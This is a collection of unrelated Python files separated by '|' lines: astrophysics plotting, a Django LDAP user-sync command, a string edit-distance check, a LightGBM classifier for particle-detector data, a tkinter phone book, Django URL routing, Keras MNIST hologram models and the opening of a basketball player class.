mid4.append((Gas_O_over_H_at_all_step_list[4][i] + Star_O_over_H_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[O/H]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
#########################
plt.show()
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(2, figsize=(6, 5.25))
# ax = fig.add_subplot(1, 1, 1)
# plt.plot(time, Gas_Fe_over_H, label='Gas [Fe/H]')
# plt.plot(time, Star_Fe_over_H, label='Star [Fe/H]')
# plt.plot(time, Gas_Mg_over_H, label='Gas [Mg/H]')
# plt.plot(time, Star_Mg_over_H, label='Star [Mg/H]')
# plt.xlabel(r'age [yr]')
# plt.ylabel('[Metal/H]')
# # plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
# plt.tight_layout()
# plt.legend(prop={'size': 10}, loc='best')
# plt.show()
return
if __name__ == '__main__':
plot(plot_star=1, plot_gas=1, plot_mid=0, x_axis="LumDyn", SFE=[0.5, 0.5, 0.5, 0.5, 0.5, 0.5], log_SFR=[-1, 0, 1, 2, 3, 4], IMF="igimf")
# x_axis = "dynamical" or "luminous" or "LumDyn" or "SFR"
# LumDyn: Burstein et al. 1997, sigma = 0.86 * (M_lum)^0.22
|
from django.core.management.base import BaseCommand
from django.contrib.auth import get_user_model
from django_auth_sgf.backend import SGFBackend
class Command(BaseCommand):
help = 'Syncs the RA and Hall Staff users'
def handle(self, *args, **options):
## Find all HallStaff and RAs to update them first (in case any are missing)
## Then just repopulate the data for every other user already in EXDB
ldap_backend = SGFBackend()
already_populated_usernames = set()
# TODO: Ideally this would just read from the USER_FLAGS_BY_GROUP setting
for group in ('RL-RESLIFE-HallStaff', 'RL-RESLIFE-RA'):
usernames = get_group_members(group)
# Add/update the user
for username in usernames:
user = ldap_backend.populate_user(username)
already_populated_usernames.add(user.username)
# Update everyone else
for username in get_user_model().objects.exclude(username__in=already_populated_usernames).values_list('username', flat=True):
user = ldap_backend.populate_user(username)
return
def get_group_members(group):
# Find all the child groups, return all their members
ldap_backend = SGFBackend()
ldap_settings = ldap_backend.settings
ldap = ldap_backend.ldap
conn = ldap.initialize(ldap_settings.SERVER_URI)
conn.set_option(ldap.OPT_PROTOCOL_VERSION, ldap.VERSION3)
conn.set_option(ldap.OPT_REFERRALS, 0)
conn.bind_s(ldap_settings.BIND_DN, ldap_settings.BIND_PASSWORD)
search = ldap_settings.GROUP_SEARCH.search_with_additional_terms({'cn': group})
group_DNs = {list(search.execute(conn))[0][0]}
all_group_DNs = set(group_DNs)
# Find all the nested groups contained in the group
while group_DNs:
search_str = '(|%s)' % ''.join('(memberof=%s)' % g for g in group_DNs)
search = ldap_settings.GROUP_SEARCH.search_with_additional_term_string(search_str)
group_DNs = {x[0] for x in list(search.execute(conn))}
all_group_DNs |= group_DNs
# Find the members of all the groups
search_str = '(&(objectClass=person)(|%s))' % ''.join('(memberof=%s)' % g for g in all_group_DNs)
user_search = ldap_settings.USER_SEARCH.search_with_additional_term_string('') # Make a copy of the original
if hasattr(user_search, 'searches'):
# LDAPSearchUnion
for search in user_search.searches:
search.filterstr = search_str
else:
# LDAPSearch
user_search.filterstr = search_str
usernames = {u[1]['cn'][0] for u in user_search.execute(conn)}
return usernames
|
'''
Time O(n)
Space O(1)
'''
def isOneEditAway(str1, str2):
if abs(len(str1) - len(str2)) > 1:
return False
if len(str1) == len(str2):
return isOneReplaceAway(str1, str2, "edit")
if len(str1) > len(str2):
return isOneReplaceAway(str1, str2, "add")
if len(str1) < len(str2):
return isOneReplaceAway(str2, str1, "add")
def isOneReplaceAway(str1, str2, operation):
idx1 = 0
idx2 = 0
isEdited = False
while idx1 < len(str1):
if str1[idx1] != str2[idx2]:
if isEdited:
return False
else:
isEdited = True
if operation == "add":
idx1 += 1
continue
idx1 += 1
idx2 += 1
return True
print(isOneEditAway("pale", "bale"))
print(isOneEditAway("pale", "ple"))
print(isOneEditAway("ple", "pale"))
print(isOneEditAway("kalp", "pale"))
print(isOneEditAway("please", "pale"))
|
# I decided to convert Jupyter notebook to ordinary python script for straightforward evaluation
import numpy as np
import pandas as pd
import json
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from lightgbm.sklearn import LGBMClassifier
import scoring # local file
with open('type_converter_dict.json', 'r') as f:
tcd = f.read()
type_converter = json.loads(tcd)
revert_to_type = {
'np.int32' : np.int32,
'np.float32' : np.float32,
'object' : object,
}
for key in type_converter:
type_converter[key] = revert_to_type[type_converter[key]]
columns = [key for key in type_converter if not key.startswith('FOI_hits_') or key == 'FOI_hits_N']
data1 = pd.read_csv('../data/train_part_1_v2.csv.gz', dtype=type_converter, usecols=columns, index_col='id')
data2 = pd.read_csv('../data/train_part_2_v2.csv.gz', dtype=type_converter, usecols=columns, index_col='id')
data = pd.concat((data1, data2), axis=0, ignore_index=True)
data1, data2 = 0, 0
test_columns = list(set(columns) - (set(columns) & set(['weight', 'label', 'sWeight', 'kinWeight', 'particle_type'])))
test_final = pd.read_csv('../data/test_private_v3_track_1.csv.gz', usecols=test_columns, index_col='id')
# preprocessing functions
def add_null_feature(data):
data['miss_2'] = (data['MatchedHit_X[2]'] == -9999).astype(int)
data['miss_3'] = (data['MatchedHit_X[3]'] == -9999).astype(int)
return data
def set_null_xy(data):
idx = data['MatchedHit_X[2]'] == -9999
data.loc[idx, 'MatchedHit_X[2]'] = data[idx]['MatchedHit_X[1]'] - data[idx]['MatchedHit_X[0]']
data.loc[idx, 'MatchedHit_X[3]'] = data[idx]['MatchedHit_X[2]'] - data[idx]['MatchedHit_X[1]']
data.loc[idx, 'MatchedHit_Y[2]'] = data[idx]['MatchedHit_X[1]'] - data[idx]['MatchedHit_X[0]']
data.loc[idx, 'MatchedHit_Y[3]'] = data[idx]['MatchedHit_X[2]'] - data[idx]['MatchedHit_X[1]']
return data
def set_uncrossed_time(data):
for i in range(4):
idx = (data['MatchedHit_TYPE[%i]' % i] == 1) | (data['MatchedHit_TYPE[%i]' % i] == 0)
data.loc[idx, 'MatchedHit_DT[%i]' % i] = 15
return data
def add_growing_time(data):
d = data
mht = 'MatchedHit_T'
idx = (d[mht+'[0]'] <= d[mht+'[1]']) & (d[mht+'[1]'] <= d[mht+'[2]']) & (d[mht+'[2]'] <= d[mht+'[3]']) & (d[mht+'[3]'] != 255)
data['time_grows'] = idx.astype(int)
return data
def add_sum_dtime(data):
mht = 'MatchedHit_DT'
data['sum_dtime'] = data[mht+'[0]'] + data[mht+'[1]'] + data[mht+'[2]'] + data[mht+'[3]']
return data
def add_diff_xy(data):
x = data
med_x = np.abs(np.median([x['MatchedHit_X[1]'] - x['MatchedHit_X[0]'],
x['MatchedHit_X[2]'] - x['MatchedHit_X[1]'],
x['MatchedHit_X[3]'] - x['MatchedHit_X[2]']], axis=0))
diff_x = [np.abs(np.abs(x['MatchedHit_X[1]'] - x['MatchedHit_X[0]']) - med_x) - (x['MatchedHit_DX[1]']+x['MatchedHit_DX[0]'])/4,
np.abs(np.abs(x['MatchedHit_X[2]'] - x['MatchedHit_X[1]']) - med_x) - (x['MatchedHit_DX[2]']+x['MatchedHit_DX[1]'])/4,
np.abs(np.abs(x['MatchedHit_X[3]'] - x['MatchedHit_X[2]']) - med_x) - (x['MatchedHit_DX[3]']+x['MatchedHit_DX[2]'])/4]
diff_x = np.clip(diff_x, a_min=0, a_max=9000)
divergence_x = np.sum(np.square(diff_x), axis=0)
med_y = np.abs(np.median([x['MatchedHit_Y[1]'] - x['MatchedHit_Y[0]'],
x['MatchedHit_Y[2]'] - x['MatchedHit_Y[1]'],
x['MatchedHit_Y[3]'] - x['MatchedHit_Y[2]']], axis=0))
diff_y = [np.abs(np.abs(x['MatchedHit_Y[1]'] - x['MatchedHit_Y[0]']) - med_y) - (x['MatchedHit_DY[1]']+x['MatchedHit_DY[0]'])/4,
np.abs(np.abs(x['MatchedHit_Y[2]'] - x['MatchedHit_Y[1]']) - med_y) - (x['MatchedHit_DY[2]']+x['MatchedHit_DY[1]'])/4,
np.abs(np.abs(x['MatchedHit_Y[3]'] - x['MatchedHit_Y[2]']) - med_y) - (x['MatchedHit_DY[3]']+x['MatchedHit_DY[2]'])/4]
diff_y = np.clip(diff_y, a_min=0, a_max=9000)
divergence_y = np.sum(np.square(diff_y), axis=0)
return pd.concat((data,
pd.Series(divergence_x, name='div_x'),
pd.Series(divergence_y, name='div_y')), axis=1)
def add_Lextra_dirs(data):
dir_x = data['Lextra_X[3]'] - data['Lextra_X[0]']
dir_y = data['Lextra_Y[3]'] - data['Lextra_Y[0]']
return pd.concat((data,
pd.Series(dir_x, name='lextra_dir_x'),
pd.Series(dir_y, name='lextra_dir_y')), axis=1)
def add_MatchedHit_dirs(data):
dir_x = np.median([data['MatchedHit_X[1]'] - data['MatchedHit_X[0]'],
data['MatchedHit_X[2]'] - data['MatchedHit_X[1]'],
data['MatchedHit_X[3]'] - data['MatchedHit_X[2]']], axis=0)
dir_y = np.median([data['MatchedHit_Y[1]'] - data['MatchedHit_Y[0]'],
data['MatchedHit_Y[2]'] - data['MatchedHit_Y[1]'],
data['MatchedHit_Y[3]'] - data['MatchedHit_Y[2]']], axis=0)
return pd.concat((data,
pd.Series(dir_x, name='matched_dir_x'),
pd.Series(dir_y, name='matched_dir_y')), axis=1)
def add_Lextra_Matched_diffs_relative(data):
diff_x_rel = np.abs((data['lextra_dir_x'] - data['matched_dir_x']) / data['matched_dir_x'])
diff_y_rel = np.abs((data['lextra_dir_y'] - data['matched_dir_y']) / data['matched_dir_y'])
return pd.concat((data,
pd.Series(diff_x_rel, name='LM_diff_x_rel'),
pd.Series(diff_y_rel, name='LM_diff_y_rel')), axis=1)
def drop_MatchedHit_DZ_FEATURES(data):
return data.drop(['MatchedHit_DZ[0]', 'MatchedHit_DZ[1]', 'MatchedHit_DZ[2]', 'MatchedHit_DZ[3]'], axis=1)
def basic_preprocess(data):
data = add_null_feature(data)
data = set_null_xy(data)
data = set_uncrossed_time(data)
data = add_growing_time(data)
data = add_sum_dtime(data)
data = add_diff_xy(data)
data = add_Lextra_dirs(data)
data = add_MatchedHit_dirs(data)
data = add_Lextra_Matched_diffs_relative(data)
data = drop_MatchedHit_DZ_FEATURES(data)
data['ndof'] = data['ndof'].map({4:0, 6:1, 8:2})
data['NShared'] = data['NShared'].apply(lambda x: x if x < 3 else 2)
return data
def train_preprocess(data):
data = basic_preprocess(data)
return data
def test_preprocess(data):
data = basic_preprocess(data)
return data
def get_data_train(data):
return data.drop(['kinWeight', 'label', 'particle_type', 'sWeight', 'weight'], axis=1)
scaling_columns = ['ncl[0]', 'ncl[1]', 'ncl[2]', 'ncl[3]', 'avg_cs[0]', 'avg_cs[1]',
'avg_cs[2]', 'avg_cs[3]',
'MatchedHit_X[0]', 'MatchedHit_X[1]', 'MatchedHit_X[2]',
'MatchedHit_X[3]', 'MatchedHit_Y[0]', 'MatchedHit_Y[1]',
'MatchedHit_Y[2]', 'MatchedHit_Y[3]', 'MatchedHit_Z[0]',
'MatchedHit_Z[1]', 'MatchedHit_Z[2]', 'MatchedHit_Z[3]',
'MatchedHit_DX[0]', 'MatchedHit_DX[1]', 'MatchedHit_DX[2]',
'MatchedHit_DX[3]', 'MatchedHit_DY[0]', 'MatchedHit_DY[1]',
'MatchedHit_DY[2]', 'MatchedHit_DY[3]', 'MatchedHit_T[0]',
'MatchedHit_T[1]', 'MatchedHit_T[2]', 'MatchedHit_T[3]',
'MatchedHit_DT[0]', 'MatchedHit_DT[1]', 'MatchedHit_DT[2]',
'MatchedHit_DT[3]', 'Lextra_X[0]', 'Lextra_X[1]', 'Lextra_X[2]',
'Lextra_X[3]', 'Lextra_Y[0]', 'Lextra_Y[1]', 'Lextra_Y[2]',
'Lextra_Y[3]', 'Mextra_DX2[0]', 'Mextra_DX2[1]',
'Mextra_DX2[2]', 'Mextra_DX2[3]', 'Mextra_DY2[0]', 'Mextra_DY2[1]',
'Mextra_DY2[2]', 'Mextra_DY2[3]', 'PT', 'P',
'sum_dtime', 'div_x', 'div_y', 'lextra_dir_x',
'lextra_dir_y', 'matched_dir_x', 'matched_dir_y', 'LM_diff_x_rel',
'LM_diff_y_rel']
stdscalers = {col:StandardScaler() for col in scaling_columns}
def scale_fit(data):
for col in scaling_columns:
stdscalers[col].fit(data[col].values.reshape(-1, 1))
return data
def scale_transform(data):
for col in scaling_columns:
data[col] = stdscalers[col].transform(data[col].values.reshape(-1, 1))
return data
def train_kfold_lgbms(X, y, weights, n_folds=3):
lgbms = [LGBMClassifier(n_estimators=800,
learning_rate=0.2,
min_data_in_leaf=200,
max_depth=8,
num_leaves=80,
max_bin=256,
importance_type='gain')
for i in range(n_folds)]
skf = StratifiedKFold(n_splits=n_folds)
i = 0
for train_index, valid_index in skf.split(X, y):
swegh = np.abs(weights.loc[X.iloc[train_index].index.values])
swegh[swegh>100] = 100
lgbms[i].fit(X.iloc[train_index], y.iloc[train_index],
eval_set=(X.iloc[valid_index], y.iloc[valid_index]),
early_stopping_rounds=10,
categorical_feature=['ndof', 'NShared', 'miss_2', 'miss_3', 'time_grows',
'MatchedHit_TYPE[0]','MatchedHit_TYPE[1]',
'MatchedHit_TYPE[2]','MatchedHit_TYPE[3]',],
verbose=10,
sample_weight=swegh) # regretfully, i forgot to fix random seed, so result is unrepeatable :(
print('trained {0}/{1}'.format(i+1, n_folds))
i += 1
return lgbms
def get_kfold_prediction(models, X_test):
predictions = np.ndarray((len(models), X_test.shape[0]))
for i, model in enumerate(models):
predictions[i] = model.predict_proba(X_test)[:,1]
return predictions
# train
data = train_preprocess(data)
data_train = get_data_train(data)
data = data[['kinWeight', 'label', 'particle_type', 'sWeight', 'weight']]
scale_fit(data_train)
data_train = scale_transform(data_train)
lgbms = train_kfold_lgbms(data_train, data['label'], data['weight'], 4)
# test
test_final = test_preprocess(test_final)
test_final = scale_transform(test_final)
predictions_lgbm = get_kfold_prediction(models=lgbms, X_test=test_final)
pred_lgbm = predictions_lgbm.mean(axis=0)
pd.DataFrame(data={"prediction": pred_lgbm}, index=test_final.index).to_csv("../pre_final_submission.csv", index_label='id')
|
from tkinter import *
import tkinter.messagebox as msgbox
def savetofile():
f = open("telefonnummer.txt", "a")
f.write(entName.get() + " " + entTele.get() + "\n")
f.close()
root = Tk()
lblName = Label(root, text="Namn : ")
lblName.grid(row=0, column=0)
lblTele = Label(root, text="Tele: ")
lblTele.grid(row=1,column=0)
entName = Entry(root)
entName.grid(row=0, column=1)
entTele = Entry(root)
entTele.grid(row=1, column=1)
btnSave = Button(root, text="Spara till fil!", command=savetofile)
btnSave.grid(row=2, column=0, columnspan=2)
root.mainloop()
|
from django.db import router
from django.urls import path
from django.urls.conf import include
from .views import eliminar_juego, index, modificar_juego
from .views import formulario
from .views import galeria
from .views import listado_juegos
from .views import nuevo_juego
from .views import JuegoViewSet
from rest_framework import routers
router = routers.DefaultRouter()
router.register('juegos', JuegoViewSet)
urlpatterns = [
path('', index, name="index"),
path('formulario/',formulario,name="formulario"),
path('galeria/', galeria, name="galeria"),
path('listado-juegos/', listado_juegos, name = "listado_juegos"),
path('nuevo-juego/', nuevo_juego, name = "nuevo_juego"),
path('modificar-juego/<id>/', modificar_juego, name = "modificar_juego"),
path('eliminar-juego/<id>/', eliminar_juego , name="eliminar_juego"),
path('api/', include(router.urls)),
]
|
from .firefighter_views import *
from .home_view import *
from .vehicle_views import *
from .equipment_views import *
from .service_views import *
from .history_equipment_views import *
from .history_vehicle_views import *
from .users_management_views import *
|
# mnist.py
import numpy as np
import matplotlib.pyplot as plt
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.layers import Input, UpSampling2D
from keras.models import Model
from keras.utils import np_utils
from keras import backend as K
from . import recon_one as recon
import kkeras
np.random.seed(1337) # for reproducibility
class CNN():
def __init__(self):
"""
By invoke run(), all code is executed.
"""
(X_train, y_train), (X_test, y_test) = mnist.load_data()
self.Org = (X_train, y_train), (X_test, y_test)
self.Data = self.Org
def run(self, nb_epoch=12):
batch_size = 128
nb_classes = 10
nb_epoch = nb_epoch
# input image dimensions
img_rows, img_cols = 28, 28
# number of convolutional filters to use
nb_filters = 32
# size of pooling area for max pooling
pool_size = (2, 2)
# convolution kernel size
kernel_size = (3, 3)
# the data, shuffled and split between train and test sets
# (X_train, y_train), (X_test, y_test) = mnist.load_data()
(X_train, y_train), (X_test, y_test) = self.Data
if K.image_dim_ordering() == 'th':
X_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)
X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print('X_train shape:', X_train.shape)
print(X_train.shape[0], 'train samples')
print(X_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
model = Sequential()
model.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1],
border_mode='valid',
input_shape=input_shape))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1]))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=pool_size))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='adadelta',
metrics=['accuracy'])
model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_test, Y_test))
score = model.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
def holo_transform(Org):
# Transform X_train and X_test using hologram filtering.
(X_train, dump_train), (X_test, dump_test) = Org
print('Performing hologram transformation...')
sim = recon.Simulator(X_train.shape[1:])
X_train_holo = np.array([sim.diffract(x) for x in X_train])
X_test_holo = np.array([sim.diffract(x) for x in X_test])
Data = (X_train_holo, dump_train), (X_test_holo, dump_test)
return Data
def recon_transform(Holo):
"""
One-shot Recon with Hologram Image
"""
(X_train_holo, dump_train), (X_test_holo, dump_test) = Holo
print('Performing first-shot recon...')
sim = recon.Simulator(X_train_holo.shape[1:])
X_train_recon = np.array([np.abs(sim.reconstruct(x))
for x in X_train_holo])
X_test_recon = np.array([np.abs(sim.reconstruct(x))
for x in X_test_holo])
Data = (X_train_recon, dump_train), (X_test_recon, dump_test)
return Data
def update2(x_train, x_test):
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 1, 28, 28))
x_test = np.reshape(x_test, (len(x_test), 1, 28, 28))
return x_train, x_test
class CNN_HOLO(CNN):
def __init__(self):
"""
This CNN includes hologram transformation.
After transformation, CNN is working similarly.
"""
super().__init__()
def _holo_transform_r0(self):
# Transform X_train and X_test using hologram filtering.
(X_train, y_train), (X_test, y_test) = self.Org
print('Performing hologram transformation...')
sim = recon.Simulator(X_train.shape[1:])
X_train_holo = np.array([sim.diffract(x) for x in X_train])
X_test_holo = np.array([sim.diffract(x) for x in X_test])
self.Data = (X_train_holo, y_train), (X_test_holo, y_test)
self.Holo = self.Data
def holo_transform(self):
self.Data = holo_transform(self.Org)
self.Holo = self.Data
def holo_complex_transform(self):
# Transform X_train and X_test using hologram filtering.
(X_train, y_train), (X_test, y_test) = self.Org
print('Performing complex hologram transformation...')
sim = recon.Simulator(X_train.shape[1:])
def holo(X_train):
X_train_holo_abs_l = []
X_train_holo_ang_l = []
for x in X_train:
X_train_h = sim.diffract_full(x)
X_train_holo_abs_l.append(np.abs(X_train_h))
X_train_holo_ang_l.append(np.angle(X_train_h))
X_train_holo = np.zeros(
(X_train.shape[0], 2, X_train.shape[1], X_train.shape[2]))
X_train_holo[:, 0, :, :] = np.array(X_train_holo_abs_l)
X_train_holo[:, 1, :, :] = np.array(X_train_holo_ang_l)
return X_train_holo
X_train_holo = holo(X_train)
X_test_holo = holo(X_test)
self.Data = (X_train_holo, y_train), (X_test_holo, y_test)
self.Holo_complex = self.Data
self.complex_flag = True
def _recon_transform_r0(self):
if not hasattr(self, 'Holo'):
self.holo_transform()
(X_train_holo, y_train), (X_test_holo, y_test) = self.Holo
print('Performing first-shot recon...')
sim = recon.Simulator(X_train_holo.shape[1:])
X_train_recon = np.array([np.abs(sim.reconstruct(x))
for x in X_train_holo])
X_test_recon = np.array([np.abs(sim.reconstruct(x))
for x in X_test_holo])
self.Data = (X_train_recon, y_train), (X_test_recon, y_test)
self.Recon = self.Data
def recon_transform(self):
"""
self.recon_transform is performed using recon_transform()
"""
if not hasattr(self, 'Holo'):
self.holo_transform()
self.Data = recon_transform(self.Holo)
self.Recon = self.Data
def run(self, nb_epoch=12):
if hasattr(self, 'complex_flag') and self.complex_flag:
print('Classification for complex input data...')
self.run_complex(nb_epoch=nb_epoch)
else:
print('Classificaiton for real input data...')
super().run(nb_epoch=nb_epoch)
def run_complex(self, nb_epoch=12, kernel_size_1=None):
batch_size = 128
nb_classes = 10
nb_epoch = nb_epoch
# input image dimensions
img_rows, img_cols = 28, 28
# number of convolutional filters to use
nb_filters = 32
# size of pooling area for max pooling
pool_size = (2, 2)
# convolution kernel size
kernel_size = (3, 3)
if kernel_size_1 is None:
kernel_size_1 = kernel_size
# the data, shuffled and split between train and test sets
# (X_train, y_train), (X_test, y_test) = mnist.load_data()
(X_train, y_train), (X_test, y_test) = self.Data
# number of input data sets - abs and angle
nb_rgb = X_train.shape[1]
if K.image_dim_ordering() == 'th':
input_shape = (nb_rgb, img_rows, img_cols)
else:
raise ValueError('Only th ordering is support yet for RGB data')
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print('X_train shape:', X_train.shape)
print(X_train.shape[0], 'train samples')
print(X_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
model = Sequential()
model.add(Convolution2D(nb_filters, kernel_size_1[0], kernel_size_1[1],
border_mode='valid',
input_shape=input_shape))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1]))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=pool_size))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='adadelta',
metrics=['accuracy'])
model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_test, Y_test))
score = model.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
class AE:
def __init__(self):
(X_train, y_train), (X_test, y_test) = mnist.load_data()
# Modify input and output data to be appropritate for AE
self.Org = (X_train, X_train), (X_test, X_test)
self.Data = self.Org
def modeling(self):
input_img = Input(shape=(1, 28, 28))
# set-1
x = Convolution2D(16, 3, 3, activation='relu',
border_mode='same')(input_img) # 16,28,28
x = MaxPooling2D((2, 2), border_mode='same')(x) # 16,14,14
x = Dropout(0.25)(x) # Use dropout after maxpolling
# set-2
x = Convolution2D(8, 3, 3, activation='relu',
border_mode='same')(x) # 8,14,14
x = MaxPooling2D((2, 2), border_mode='same')(x) # 8,7,7
x = Dropout(0.25)(x) # Use dropout after maxpolling
# set-3
x = Convolution2D(8, 3, 3, activation='relu',
border_mode='same')(x) # 8,7,7
encoded = x
x = Convolution2D(8, 3, 3, activation='relu',
border_mode='same')(encoded) # 8,7,7
# x = Dropout(0.25)(x) # Use dropout after maxpolling
x = UpSampling2D((2, 2))(x) # 8,14,14
x = Convolution2D(8, 3, 3, activation='relu',
border_mode='same')(x) # 8,14,14
# x = Dropout(0.25)(x) # Use dropout after maxpolling
x = UpSampling2D((2, 2))(x) # 8, 28, 28
x = Convolution2D(16, 3, 3, activation='relu',
border_mode='same')(x) # 16, 28, 28
# x = Dropout(0.25)(x) # Use dropout after maxpolling
decoded = Convolution2D(
1, 3, 3, activation='sigmoid', border_mode='same')(x) # 1, 28, 28
autoencoder = Model(input_img, decoded)
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy')
self.autoencoder = autoencoder
def run(self, nb_epoch=100):
(x_train_in, x_train), (x_test_in, x_test) = self.Data
x_train_in, x_test_in = update2(x_train_in, x_test_in)
x_train, x_test = update2(x_train, x_test)
self.modeling()
autoencoder = self.autoencoder
history = autoencoder.fit(x_train_in, x_train,
nb_epoch=nb_epoch,
batch_size=128,
shuffle=True,
verbose=1,
validation_data=(x_test, x_test))
kkeras.plot_loss(history)
self.imshow()
#def imshow(self, x_test, x_test_in):
def imshow(self):
(_, _), (x_test_in, x_test) = self.Data
x_test_in, x_test = update2(x_test_in, x_test)
autoencoder = self.autoencoder
decoded_imgs = autoencoder.predict(x_test_in)
n = 10
plt.figure(figsize=(20, 4))
for i in range(n):
# display original
ax = plt.subplot(2, n, i + 1)
plt.imshow(x_test[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# display reconstruction
ax = plt.subplot(2, n, i + n + 1)
plt.imshow(decoded_imgs[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show()
class _AE_HOLO_r0(AE):
def __init__(self):
"""
Hologram transformation is performed
"""
super().__init__()
def holo_transform(self):
(x_train, _), (x_test, _) = self.Org
(x_train_in, _), (x_test_in, _) = holo_transform(self.Org)
self.Data = (x_train_in, x_train), (x_test_in, x_test)
self.Holo = self.Data
def imshow(self):
(_, _), (x_test_in, x_test) = self.Data
x_test_in, x_test = update2(x_test_in, x_test)
autoencoder = self.autoencoder
decoded_imgs = autoencoder.predict(x_test_in)
n = 10
plt.figure(figsize=(20, 4))
for i in range(n):
# display original
ax = plt.subplot(3, n, i + 1)
plt.imshow(x_test[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
ax = plt.subplot(3, n, n + i + 1)
plt.imshow(x_test_in[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# display reconstruction
ax = plt.subplot(3, n, n * 2 + i + 1)
plt.imshow(decoded_imgs[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show()
class AE_HOLO(AE):
def __init__(self):
"""
Hologram transformation is performed
"""
super().__init__()
(x_train, _), (x_test, _) = self.Org
x_train_in, x_test_in = x_train, x_test
self.Org = (x_train_in, x_train), (x_test_in, x_test)
def holo_transform(self):
CNN_HOLO.holo_transform(self)
def recon_transform(self):
CNN_HOLO.recon_transform(self)
def imshow(self):
(_, _), (x_test_in, x_test) = self.Data
x_test_in, x_test = update2(x_test_in, x_test)
autoencoder = self.autoencoder
decoded_imgs = autoencoder.predict(x_test_in)
n = 10
plt.figure(figsize=(20, 4))
for i in range(n):
# display original
ax = plt.subplot(3, n, i + 1)
plt.imshow(x_test[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
ax = plt.subplot(3, n, n + i + 1)
plt.imshow(x_test_in[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# display reconstruction
ax = plt.subplot(3, n, n * 2 + i + 1)
plt.imshow(decoded_imgs[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show() |
import random
#1.---CREATE PLAYER---
# 1.1 --Create Player Class--
class Player:
def __init__ (self, vitals, measurements, traits,
threepoint_scoring, midrange_scoring, close_scoring, scoring_instincts, free_throw, driving_finesse,
driving_strong, onballD_perimeter, onballD_post, team_defense, stealing, shot_defense, shot_blocking, rebounding,
ball_handling, passing, post_control, lowpost_strong, lowpost_finesse, highpost_finesse, athleticism, years_pro):
#Bio
self.vitals = vitals
self.measurements = measurements
self.traits = traits
#Skillz
self.threepoint_scoring = threepoint_scoring
self.midrange_scoring = midrange_scoring
self.close_scoring = close_scoring
self.scoring_instincts = scoring_instincts
self.free_throw = free_throw
self.driving_finesse = driving_finesse
self.driving_strong = driving_strong
self.onballD_perimeter = onballD_perimeter
self.onballD_post = onballD_post
self.team_defense = team_defense
self.stealing = stealing
self.shot_defense = shot_defense
self.shot_blocking = shot_blocking
